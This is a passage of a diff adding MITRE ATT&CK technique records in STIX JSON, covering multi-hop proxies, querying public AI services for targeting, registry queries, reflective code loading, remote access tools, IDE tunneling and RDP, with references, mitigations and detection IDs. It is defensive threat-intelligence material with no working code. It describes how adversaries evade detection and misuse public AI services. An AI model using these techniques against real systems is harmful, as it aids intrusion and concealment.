peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1090/003",
+                            "external_id": "T1090.003"
+                        },
+                        {
+                            "source_name": "ORB Mandiant",
+                            "description": "Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved July 8, 2024.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks"
+                        },
+                        {
+                            "source_name": "NGLite Trojan",
+                            "description": "Robert Falcone, Jeff White, and Peter Renals. (2021, November 7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer. Retrieved February 8, 2024.",
+                            "url": "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+                        },
+                        {
+                            "source_name": "Onion Routing",
+                            "description": "Wikipedia. (n.d.). Onion Routing. Retrieved October 20, 2020.",
+                            "url": "https://en.wikipedia.org/wiki/Onion_routing"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Eduardo Chavarro Ovalle"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Network Devices",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.4",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.706000+00:00\", \"old_value\": \"2025-10-24 17:49:11.774000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "2.4",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0359: Multi-hop Proxy Behavior via Relay Node Chaining, Onion Routing, and Network Tunneling"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--143122a8-fcda-4dd7-aded-5b9387d9c2d6",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2026-03-25 14:21:30.680000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Query Public AI Services",
+                    "description": "Adversaries may query publicly accessible artificial intelligence (AI) services, such as large language models (LLMs), to support targeting and operations. In addition to searching websites or databases directly (i.e., [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), adversaries may use AI services to synthesize, aggregate, and analyze publicly available information at scale. This may include identifying individuals or organizations to target, researching organizational structures and personnel, identifying technologies used by target organizations, researching business relationships to develop plausible pretexts for [Social Engineering](https://attack.mitre.org/techniques/T1684) approaches, identifying contact information for use in [Phishing](https://attack.mitre.org/techniques/T1566) or [Phishing for Information](https://attack.mitre.org/techniques/T1598), or gathering derogatory or sensitive information about individuals that may be used for extortion or coercion.(Citation: MSFT-AI)(Citation: GTIG AI Threat Tracker)\n\nInformation gathered through AI services may be leveraged for other behaviors, such as establishing operational resources (i.e., [Generate Content](https://attack.mitre.org/techniques/T1683) or [Establish Accounts](https://attack.mitre.org/techniques/T1585). For obtaining access to AI tools and services, see [Artificial Intelligence](https://attack.mitre.org/techniques/T1588/007).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "reconnaissance"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1682",
+                            "external_id": "T1682"
+                        },
+                        {
+                            "source_name": "GTIG AI Threat Tracker",
+                            "description": "Google Threat Intelligence Group . (2026, February 12). GTIG AI Threat Tracker: Distillation, Experimentation, and (Continued) Integration of AI for Adversarial Use. Retrieved March 25, 2026.",
+                            "url": "https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use"
+                        },
+                        {
+                            "source_name": "MSFT-AI",
+                            "description": "Microsoft Threat Intelligence. (2024, February 14). Staying ahead of threat actors in the age of AI. Retrieved March 11, 2024.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2024/02/14/staying-ahead-of-threat-actors-in-the-age-of-ai/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "PRE"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-20 20:59:00.096000+00:00\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1056: Pre-compromise"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0919: Detection of Query Public AI Services"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2017-05-31 21:30:25.584000+00:00",
+                    "modified": "2026-05-12 15:12:00.714000+00:00",
+                    "name": "Query Registry",
+                    "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "discovery"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1012",
+                            "external_id": "T1012"
+                        },
+                        {
+                            "source_name": "Wikipedia Windows Registry",
+                            "description": "Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.",
+                            "url": "https://en.wikipedia.org/wiki/Windows_Registry"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.3",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.714000+00:00\", \"old_value\": \"2025-10-24 17:49:20.660000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.3",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0209: Detection of Registry Query for Environmental Discovery"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-05 01:15:06.293000+00:00",
+                    "modified": "2026-05-12 15:12:00.630000+00:00",
+                    "name": "Reflective Code Loading",
+                    "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1620",
+                            "external_id": "T1620"
+                        },
+                        {
+                            "source_name": "00sec Droppers",
+                            "description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.",
+                            "url": "https://0x00sec.org/t/super-stealthy-droppers/3715"
+                        },
+                        {
+                            "source_name": "S1 Custom Shellcode Tool",
+                            "description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.",
+                            "url": "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/"
+                        },
+                        {
+                            "source_name": "Mandiant BYOL",
+                            "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 4, 2021.",
+                            "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"
+                        },
+                        {
+                            "source_name": "S1 Old Rat New Tricks",
+                            "description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.",
+                            "url": "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/"
+                        },
+                        {
+                            "source_name": "Microsoft AssemblyLoad",
+                            "description": "Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.",
+                            "url": "https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load"
+                        },
+                        {
+                            "source_name": "Intezer ACBackdoor",
+                            "description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.",
+                            "url": "https://intezer.com/acbackdoor-analysis-of-a-new-multiplatform-backdoor/"
+                        },
+                        {
+                            "source_name": "Stuart ELF Memory",
+                            "description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.",
+                            "url": "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"
+                        },
+                        {
+                            "source_name": "Introducing Donut",
+                            "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.",
+                            "url": "https://thewover.github.io/Introducing-Donut/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Jo\u00e3o Paulo de A. Filho, @Hug1nN__",
+                        "Shlomi Salem, SentinelOne",
+                        "Lior Ribak, SentinelOne",
+                        "Rex Guo, @Xiaofei_REX, Confluera",
+                        "Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics",
+                        "Jiraput Thamsongkrah"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.630000+00:00\", \"old_value\": \"2026-04-15 22:32:18.632000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0300: Detection Strategy for Reflective Code Loading"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2018-04-18 17:59:24.739000+00:00",
+                    "modified": "2026-05-12 15:12:00.628000+00:00",
+                    "name": "Remote Access Tools",
+                    "description": "An adversary may use legitimate remote access tools to establish an interactive command and control channel within a network. Remote access tools create a session between two trusted hosts through a graphical interface, a command line interaction, a protocol tunnel via development or management software, or hardware-level access such as KVM (Keyboard, Video, Mouse) over IP solutions. Desktop support software (usually graphical interface) and remote management software (typically command line interface) allow a user to control a computer remotely as if they are a local user inheriting the user or software permissions. This software is commonly used for troubleshooting, software installation, and system management.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access.\n\nRemote access tools may be installed and used post-compromise as an alternate communications channel for redundant access or to establish an interactive remote desktop session with the target system. It may also be used as a malware component to establish a reverse connection or back-connect to a service or adversary-controlled system.\n\nInstallation of many remote access tools may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome\u2019s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1219",
+                            "external_id": "T1219"
+                        },
+                        {
+                            "source_name": "CrowdStrike 2015 Global Threat Report",
+                            "description": "CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.",
+                            "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf"
+                        },
+                        {
+                            "source_name": "CrySyS Blog TeamSpy",
+                            "description": "CrySyS Lab. (2013, March 20). TeamSpy \u2013 Obshie manevri. Ispolzovat\u2019 tolko s razreshenija S-a. Retrieved April 11, 2018.",
+                            "url": "https://blog.crysys.hu/2013/03/teamspy/"
+                        },
+                        {
+                            "source_name": "Google Chrome Remote Desktop",
+                            "description": "Google. (n.d.). Retrieved March 14, 2024.",
+                            "url": "https://support.google.com/chrome/answer/1649523"
+                        },
+                        {
+                            "source_name": "Chrome Remote Desktop",
+                            "description": "Huntress. (n.d.). Retrieved March 14, 2024.",
+                            "url": "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+                        },
+                        {
+                            "source_name": "Symantec Living off the Land",
+                            "description": "Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.",
+                            "url": "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matt Kelly, @breakersall",
+                        "Zachary Stanford, @svch0st",
+                        "Dray Agha, @Purp1eW0lf, Huntress Labs"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": false,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.628000+00:00\", \"old_value\": \"2025-10-24 17:48:42.154000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1031: Network Intrusion Prevention",
+                            "M1034: Limit Hardware Installation",
+                            "M1037: Filter Network Traffic",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0496: Behavior-Chain Detection for Remote Access Tools (Tool-Agnostic)"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--77e29a47-e263-4f11-8692-e5012f44dbac",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-20 18:46:24.598000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "IDE Tunneling",
+                    "description": "Adversaries may abuse Integrated Development Environment (IDE) software with remote development features to establish an interactive command and control channel on target systems within a network. IDE tunneling combines SSH, port forwarding, file sharing, and debugging into a single secure connection, letting developers work on remote systems as if they were local. Unlike SSH and port forwarding, IDE tunneling encapsulates an entire session and may use proprietary tunneling protocols alongside SSH, allowing adversaries to blend in with legitimate development workflows. Some IDEs, like Visual Studio Code, also provide CLI tools (e.g., `code tunnel`) that adversaries may use to programmatically establish tunnels and generate web-accessible URLs for remote access. These tunnels can be authenticated through accounts such as GitHub, enabling the adversary to control the compromised system via a legitimate developer portal.(Citation: sentinelone operationDigitalEye Dec 2024)(Citation: Unit42 Chinese VSCode 06 September 2024)(Citation: Thornton tutorial VSCode shell September 2023)\n\nAdditionally, adversaries may use IDE tunneling for persistence. Some IDEs, such as Visual Studio Code and JetBrains, support automatic reconnection. Adversaries may configure the IDE to auto-launch at startup, re-establishing the tunnel upon execution. Compromised developer machines may also be exploited as jump hosts to move further into the network.\n\nIDE tunneling tools may be built-in or installed as [IDE Extensions](https://attack.mitre.org/techniques/T1176/002).",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1219/001",
+                            "external_id": "T1219.001"
+                        },
+                        {
+                            "source_name": "sentinelone operationDigitalEye Dec 2024",
+                            "description": "Aleksandar Milenkoski, Luigi Martire. (2024, December 10). Operation Digital Eye | Chinese APT Compromises Critical Digital Infrastructure via Visual Studio Code Tunnels. Retrieved February 27, 2025.",
+                            "url": "https://www.sentinelone.com/labs/operation-digital-eye-chinese-apt-compromises-critical-digital-infrastructure-via-visual-studio-code-tunnels/"
+                        },
+                        {
+                            "source_name": "Unit42 Chinese VSCode 06 September 2024",
+                            "description": "Tom Fakterman. (2024, September 6). Chinese APT Abuses VSCode to Target Government in Asia. Retrieved March 24, 2025.",
+                            "url": "https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/"
+                        },
+                        {
+                            "source_name": "Thornton tutorial VSCode shell September 2023",
+                            "description": "Truvis Thornton. (2023, September 25). Visual Studio Code: embedded reverse shell and how to block, create Sentinel Detection, and add Environment Prevention. Retrieved March 24, 2025.",
+                            "url": "https://medium.com/@truvis.thornton/visual-studio-code-embedded-reverse-shell-and-how-to-block-create-sentinel-detection-and-add-e864ebafaf6d"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Purinut Wongwaiwuttiguldej"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.643000+00:00\", \"old_value\": \"2025-04-22 16:34:13.454000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0133: IDE Tunneling Detection via Process, File, and Network Behaviors"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d4287702-e2f7-4946-bdfa-2c7f5aaa5032",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-24 22:24:47.684000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Remote Desktop Software",
+                    "description": "An adversary may use legitimate desktop support software to establish an interactive command and control channel to target systems within networks. Desktop support software provides a graphical interface for remotely controlling another computer, transmitting the display output, keyboard input, and mouse control between devices using various protocols. Desktop support software, such as `VNC`, `Team Viewer`, `AnyDesk`, `ScreenConnect`, `LogMein`, `AmmyyAdmin`, and other remote monitoring and management (RMM) tools, are commonly used as legitimate technical support software and may be allowed by application control within a target environment.(Citation: Symantec Living off the Land)(Citation: CrowdStrike 2015 Global Threat Report)(Citation: CrySyS Blog TeamSpy) \n \nRemote access modules/features may also exist as part of otherwise existing software such as Zoom or Google Chrome\u2019s Remote Desktop.(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "command-and-control"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1219/002",
+                            "external_id": "T1219.002"
+                        },
+                        {
+                            "source_name": "CrowdStrike 2015 Global Threat Report",
+                            "description": "CrowdStrike Intelligence. (2016). 2015 Global Threat Report. Retrieved April 11, 2018.",
+                            "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/15GlobalThreatReport.pdf"
+                        },
+                        {
+                            "source_name": "CrySyS Blog TeamSpy",
+                            "description": "CrySyS Lab. (2013, March 20). TeamSpy \u2013 Obshie manevri. Ispolzovat\u2019 tolko s razreshenija S-a. Retrieved April 11, 2018.",
+                            "url": "https://blog.crysys.hu/2013/03/teamspy/"
+                        },
+                        {
+                            "source_name": "Google Chrome Remote Desktop",
+                            "description": "Google. (n.d.). Retrieved March 14, 2024.",
+                            "url": "https://support.google.com/chrome/answer/1649523"
+                        },
+                        {
+                            "source_name": "Chrome Remote Desktop",
+                            "description": "Huntress. (n.d.). Retrieved March 14, 2024.",
+                            "url": "https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708"
+                        },
+                        {
+                            "source_name": "Symantec Living off the Land",
+                            "description": "Wueest, C., Anand, H. (2017, July). Living off the land and fileless attack techniques. Retrieved April 10, 2018.",
+                            "url": "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/istr-living-off-the-land-and-fileless-attack-techniques-en.pdf"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2025-04-16 16:42:15.226000+00:00\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}}}",
+                    "previous_version": "1.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1037: Filter Network Traffic",
+                            "M1038: Execution Prevention",
+                            "M1042: Disable or Remove Feature or Program"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0259: Remote Desktop Software Execution and Beaconing Detection"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-11 18:23:26.059000+00:00",
+                    "modified": "2026-05-12 15:12:00.723000+00:00",
+                    "name": "Remote Desktop Protocol",
+                    "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\n\nRemote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services) \n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1546/008) or [Terminal Services DLL](https://attack.mitre.org/techniques/T1505/005) for Persistence.(Citation: Alperovitch Malware)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "lateral-movement"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1021/001",
+                            "external_id": "T1021.001"
+                        },
+                        {
+                            "source_name": "Alperovitch Malware",
+                            "description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 17, 2024.",
+                            "url": "https://web.archive.org/web/20191115195333/https://www.crowdstrike.com/blog/adversary-tricks-crowdstrike-treats/"
+                        },
+                        {
+                            "source_name": "TechNet Remote Desktop Services",
+                            "description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
